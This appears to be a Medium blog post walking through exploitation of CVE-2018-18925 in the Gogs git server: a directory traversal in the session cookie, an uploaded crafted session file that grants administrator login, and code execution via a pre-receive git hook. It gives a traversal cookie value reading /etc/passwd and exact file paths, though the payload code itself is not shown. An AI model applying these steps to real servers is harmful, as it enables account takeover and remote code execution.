Exploitation of CVE-2018–18925 a Remote Code Execution against the Git self hosted tool: Gogs.

Gogs is based on the Macaron framework. The system used to manage session is very similar to what PHP does. The session identifier in the cookie is mapped to a file on the file system. When the web server receives a request with a session identifier (as a cookie), it looks up for the file on the file system.

The vulnerability is a simple directory traversal when retrieving the file used for the session on the file system. You can for example, set the i_like_gogits cookie to ../../../../../../etc/passwd to get an error from the server.


In order to exploit the session bypass, we will need a way to upload a specially crafted file, then we will use this file as our session id, we can create our own crafted session id file with


go run main.go

Uploading the malicious file and logged in as administrator

When creating the copy of the repository locally, Gogs put the files in /data/gogs/data/tmp/local-repo/[REPO_ID]/[FILENAME] (this repository is only created when you use the “Upload file” functionality).

Where [FILENAME] is the name of the file you upload and [REPO_ID] is the repository identifier that can be found using the Fork link:

Where 5 is the repo id.

By default, the sessions are stored in /data/gogs/data/sessions/. Therefore, you can use the following relative path for your session id: ../tmp/local-repo/[REPO_ID]/[FILENAME]. By using this path in your i_like_gogits cookie, you should be logged in as administrator.

Remote Code Execution:

In order to get RCE, you can use the git hooks functionality in a given repository to run a shell script.

In pre-receive inject your code:

Then make a push request, with git or with create file function to get the hook executed.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store